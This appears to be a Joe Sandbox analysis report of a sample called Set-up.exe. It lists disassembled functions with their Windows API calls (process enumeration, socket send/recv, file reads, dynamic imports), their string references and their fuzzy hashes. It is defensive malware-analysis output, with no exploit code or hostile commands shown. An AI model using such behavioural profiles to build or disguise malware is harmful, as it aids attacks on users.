Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
API String ID: 420147892-2059488242
Opcode ID: ac26c90ca0b509f3d407240f083d0358749b0ca6d22dd20e416abd810dfc3dc8
Instruction ID: 3d14b65d1a6fdca5b8accec1a24ec4f04014c503b7eeeee8446ef624307d500f
Opcode Fuzzy Hash: ac26c90ca0b509f3d407240f083d0358749b0ca6d22dd20e416abd810dfc3dc8
Instruction Fuzzy Hash: CF3195B49056099FDB00EFB8C6856AEBBF0BF45314F008969E894A7241E7749A84CF52

Function 00517770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,?,005494BF,?), ref: 005177AE
recv.WS2_32(?,?,005494BF,?), ref: 005177BA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 005177F1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00517815
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051781D

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 005177E2, 00517801
RECV %s:%d recv(%lu) = %ld, xrefs: 005177C8
recv, xrefs: 005177DB, 005177FA

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: recv$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 2542159810-640788491
Opcode ID: 5af70e5bb59e2db87f7aca2ce373393c5d46ddd0203150d178a8f63ff2e6be07
Instruction ID: accd51c176418277ec14966e02566ed6923295f94153c1a80fc6abc29d4866b8
Opcode Fuzzy Hash: 5af70e5bb59e2db87f7aca2ce373393c5d46ddd0203150d178a8f63ff2e6be07
Instruction Fuzzy Hash: 6F11B6B8A082587BE110AB69DC4DF6B7F6CFB8AB68F040918F90993291D6719C40C6B1

Function 005175E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?), ref: 00517618
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00517659
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 0051767D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00517685

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 0051764A, 00517669
FD %s:%d socket() = %d, xrefs: 0051762E
socket, xrefs: 00517643, 00517662

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflushsocket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 166263346-842387772
Opcode ID: d4038dcaa5780268a1434f2017e5c349e8d51b66f171d1c5cdbea516fea167d5
Instruction ID: 84de840e5e689644a022ac6fe498dd6548c80ff191226ae438abc8f43b433979
Opcode Fuzzy Hash: d4038dcaa5780268a1434f2017e5c349e8d51b66f171d1c5cdbea516fea167d5
Instruction Fuzzy Hash: 27110679A046257BE610AB6DAC0AF9F3FA4FF86734F040914FA15962A2D331C890C2A1

Function 0089D1D0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0089D1E8

Strings

Inf, xrefs: 0089DCA5, 0089DCBD
NaN, xrefs: 0089DBAB
@, xrefs: 0089D4B7

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 026cb0e7b7d26b8e5bf9cab6e23fdda91da89fdcbcb0b85817205753c15fa055
Instruction ID: b9a4eb515533afa600c73cfccee85bc4ffd6fca33c2e55605fd97e586ee45a94
Opcode Fuzzy Hash: 026cb0e7b7d26b8e5bf9cab6e23fdda91da89fdcbcb0b85817205753c15fa055
Instruction Fuzzy Hash: 51F1A17060C3958BDB21AF24C4807ABBBE1FB85318F198A2DE9DDC7381D7359905DB86

Function 00549290 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

Part of subcall function 005176A0: send.WS2_32(multi.c,?,?,?), ref: 005176DE

WSAGetLastError.WS2_32 ref: 005493C3

Part of subcall function 0052D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,005201B1), ref: 0052D8E2

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0054935C
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00549388

Strings

cf-socket.c, xrefs: 005492CF
send(len=%zu) -> %d, err=%d, xrefs: 00549447
Send failure: %s, xrefs: 005493FB

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1798382672-2691795271
Opcode ID: a8280e554d9fe18e2796d7276708b6cc716f775ef1d5d72ec85e0bfe94f86af1
Instruction ID: 66d060ae000f97627111365c81c8db21df4c8c40f8f438043c26aa680271a49f
Opcode Fuzzy Hash: a8280e554d9fe18e2796d7276708b6cc716f775ef1d5d72ec85e0bfe94f86af1
Instruction Fuzzy Hash: 9251D274600305AFDB10DF24C886FAABBA5FF85718F148569FD488B292E770E991CB91

Function 005D77B0 Relevance: 10.6, APIs: 7, Instructions: 84fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00B1EBCD,00000000,00000000,?,?,?,005D9882,?,00000000), ref: 005D77DD
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 005D77F0
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 005D7802
GetLastError.KERNEL32(?,00000000), ref: 005D780E
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 005D7830
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 005D7843
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005D786B

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: fseek$ErrorLastfclosefopenfreadftell
String ID:
API String ID: 1915723720-0
Opcode ID: 5a64aa680baa76b2c60c957a61fdb10fabf19d74e86d562e5bc91245a25cdd3a
Instruction ID: b71674c6f53c821a4ab6f552eb7730fb9117aad51614d6c4bb0427fd16e4f54c
Opcode Fuzzy Hash: 5a64aa680baa76b2c60c957a61fdb10fabf19d74e86d562e5bc91245a25cdd3a
Instruction Fuzzy Hash: 931196E1E0930967EB3135295C4AB6B3D48FB95369F18043BFD05D6382F965D844D1B2

Function 0054A150 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 0054A1C6
WSAGetLastError.WS2_32 ref: 0054A1D0

Part of subcall function 0052D090: GetLastError.KERNEL32 ref: 0052D0A1
Part of subcall function 0052D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0A9
Part of subcall function 0052D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0CD
Part of subcall function 0052D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0D7
Part of subcall function 0052D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0052D381
Part of subcall function 0052D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0052D3A2
Part of subcall function 0052D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D3BF
Part of subcall function 0052D090: GetLastError.KERNEL32 ref: 0052D3C9
Part of subcall function 0052D090: SetLastError.KERNEL32(00000000), ref: 0052D3D4

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A21C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A220

Strings

getsockname() failed with errno %d: %s, xrefs: 0054A1F0
ssloc inet_ntop() failed with errno %d: %s, xrefs: 0054A23B

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2076026050-2605427207
Opcode ID: eb659a0edec0f4204cc2eb39b97cedd20768c1eb5b037ecadc722a77639d873d
Instruction ID: 11f9789d916c1c21b5312c327f8ac5678ec4bb17d96c82659c05127dcdf4484c
Opcode Fuzzy Hash: eb659a0edec0f4204cc2eb39b97cedd20768c1eb5b037ecadc722a77639d873d
Instruction Fuzzy Hash: A921D871848680BAF7259B28EC46FE677BCFF81328F040615F99853151FB72598587E2

Function 00517310 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00513BA6,?,00C49044,00511BD2), ref: 005173A6
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00513BA6,?,00C49044,00511BD2), ref: 005173CA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00513BA6,?,00C49044,00511BD2), ref: 005173D2

Strings

calloc, xrefs: 00517390, 005173AF
LIMIT %s:%d %s reached memlimit, xrefs: 00517397, 005173B6
MEM %s:%d calloc(%zu,%zu) = %p, xrefs: 00517376

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
API String ID: 4185500129-1340350808
Opcode ID: 0f4a66e3dbb4cbe10affc63c5d03933def141476f2ac1bcc18a66144f00dfe4c
Instruction ID: 5846523bcbc45cacc8e181a8b80b96c14e85a3fd7403bb8eb7c4b19ce8b2efc3
Opcode Fuzzy Hash: 0f4a66e3dbb4cbe10affc63c5d03933def141476f2ac1bcc18a66144f00dfe4c
Instruction Fuzzy Hash: 5321D175A043196BE3209F59DC4AF9B7FA8FF8A764F08082CFD0992252E371D840C6A1

Function 0052D5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42networklibraryloaderCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 0052D65A

Part of subcall function 0052D690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,0052D5FA,iphlpapi.dll), ref: 0052D699
Part of subcall function 0052D690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 0052D6B5
Part of subcall function 0052D690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,00AFA7B4,?,?,0052D5FA,iphlpapi.dll), ref: 0052D6C3

GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 0052D60C
QueryPerformanceFrequency.KERNEL32(00C49070), ref: 0052D643
WSACleanup.WS2_32 ref: 0052D67C

Strings

if_nametoindex, xrefs: 0052D606
iphlpapi.dll, xrefs: 0052D5F0

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
String ID: if_nametoindex$iphlpapi.dll
API String ID: 3452087986-3097795196
Opcode ID: 74ba48660ba2219203e9521aad627a0ade540451195be0be1ef7af8c0a72decd
Instruction ID: 1cf659e4b6c3eb24dead997b13af6207a9c715eb628f1eb47c76258b7479357e
Opcode Fuzzy Hash: 74ba48660ba2219203e9521aad627a0ade540451195be0be1ef7af8c0a72decd
Instruction Fuzzy Hash: 8E01D4A4E003515BE7117B78BC1F7AA3EB4BF67304F440568E849C52D2F778C488C262

Function 005C4950 Relevance: 6.2, APIs: 4, Instructions: 167networkstringCOMMON

Download Yara Rule

APIs

htonl.WS2_32(7F000001), ref: 005C4A21
gethostname.WS2_32(00000000,00000040), ref: 005C4AA4
WSAGetLastError.WS2_32 ref: 005C4AB3
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 005C4B3F

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ErrorLastgethostnamehtonlstrchr
String ID:
API String ID: 655544046-0
Opcode ID: 4a6bfcac358369caf24794643c8eba6fa1d608e3f8b0700233ea02c2afb7f4c1
Instruction ID: 13fb574dbcd0258905b597d180fc25987db03411eb3c24d67d03288ea2a7b62d
Opcode Fuzzy Hash: 4a6bfcac358369caf24794643c8eba6fa1d608e3f8b0700233ea02c2afb7f4c1
Instruction Fuzzy Hash: 7A519C706047018FEB309BA5DD59F277EE4BF41319F14082DE98A86691E775EC44CF52

Function 009BFC00 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,009BFCED), ref: 009BFC18
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,009BFCED), ref: 009BFC34
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,009BFCED), ref: 009BFC9F

Strings

, xrefs: 009BFC05

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: calloc$free
String ID:
API String ID: 171065143-3916222277
Opcode ID: 7cde8a150e4ce0c18be2e0c4f2a03f5ef0ff62ed009f263a67bfd2d9a1f5c95d
Instruction ID: b0986c0015f8ae27692bfb7843ba59bdebe8a07ad851c57335ace02430fad2d5
Opcode Fuzzy Hash: 7cde8a150e4ce0c18be2e0c4f2a03f5ef0ff62ed009f263a67bfd2d9a1f5c95d
Instruction Fuzzy Hash: EB1191B14007058FCB20DF28C99465ABBE0FF59324F158B2CD8D597391D730D945CB92

Function 00511296 Relevance: 5.1, APIs: 4, Instructions: 80stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
